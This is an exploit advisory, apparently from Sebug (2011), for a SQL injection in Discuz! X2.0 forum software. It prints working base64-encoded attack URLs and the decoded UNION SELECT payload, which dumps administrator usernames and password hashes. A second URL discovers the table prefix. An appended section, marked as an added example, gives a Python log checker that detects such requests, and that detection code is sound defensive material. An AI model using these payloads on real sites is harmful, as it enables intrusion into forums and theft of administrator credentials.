The vulnerability report:
Discuz! X2.0 SQL Injection vulnerability EXP
SSV-ID: 20671
SSV-Appdir: Discuz!
Published: 2011-06-28
Exploit:
[sebug.net]
The following procedures (methods) may contain offensive material; they are intended only for security research and teaching. Use at your own risk!
Discuz! X2.0: directly displays the administrator account and password (when the default table prefix is used)
http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGlrZSAnYWRtaW58eHx5%3D
Base64-decoded:
1' and 1=2 union all select 1,group_concat(username,0x7C3274747C,password) from pre_common_member where username like 'admin|x|y
If the default prefix is not in use, use the prefix brute-force EXP:
http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D
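A defender's check for requests of this shape, as an added example that is not part of the original advisory: it decodes the `aid` parameter of `mod=attachment` requests from an access log and flags values whose first field is not a plain number or that contain SQL syntax. It assumes a legitimate decoded `aid` is pipe-delimited with a numeric first field (suggested by the `|x|y` suffix in the decoded payload above); `make_target`, `inspect_aid` and the sample requests are constructed for illustration.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: a legitimate decoded aid is pipe-delimited and starts with a numeric id.
NUMERIC_ID = re.compile(r"[0-9]+")
SQL_MARKERS = re.compile(r"['\"]|\bunion\b|\bselect\b|information_schema", re.I)


def make_target(decoded_aid, padded=True):
    """Build a constructed request target carrying the base64-encoded aid."""
    token = base64.b64encode(decoded_aid.encode()).decode()
    if not padded:
        token = token.rstrip("=")  # logged URLs may carry short or no padding
    return "/forum.php?mod=attachment&aid=" + token.replace("=", "%3D")


def inspect_aid(request_target):
    """Return (verdict, decoded_aid) for one logged request target."""
    query = parse_qs(urlsplit(request_target).query)
    if query.get("mod") != ["attachment"] or "aid" not in query:
        return ("not-applicable", None)
    # parse_qs turns a literal '+' into a space; restore it before decoding.
    token = query["aid"][0].replace(" ", "+")
    token += "=" * (-len(token) % 4)  # tolerate missing base64 padding
    try:
        decoded = base64.b64decode(token).decode("utf-8", "replace")
    except ValueError:
        return ("undecodable", None)
    first_field = decoded.split("|", 1)[0]
    if not NUMERIC_ID.fullmatch(first_field) or SQL_MARKERS.search(decoded):
        return ("suspicious", decoded)
    return ("ok", decoded)


# Constructed samples, not taken from real logs.
SAMPLES = [
    make_target("1024|0a1b2c3d|1309219200|1|55"),
    make_target("1' and 1=2 union all select 1,2|x|y", padded=False),
    "/forum.php?mod=viewthread&tid=7",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(inspect_aid(target), target)
```

Requests flagged `suspicious` or `undecodable` are the ones to review; the decoded value returned alongside the verdict is what belongs in the alert, since the raw base64 hides the SQL from keyword-based log searches.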
// sebug.net [2011-06-29]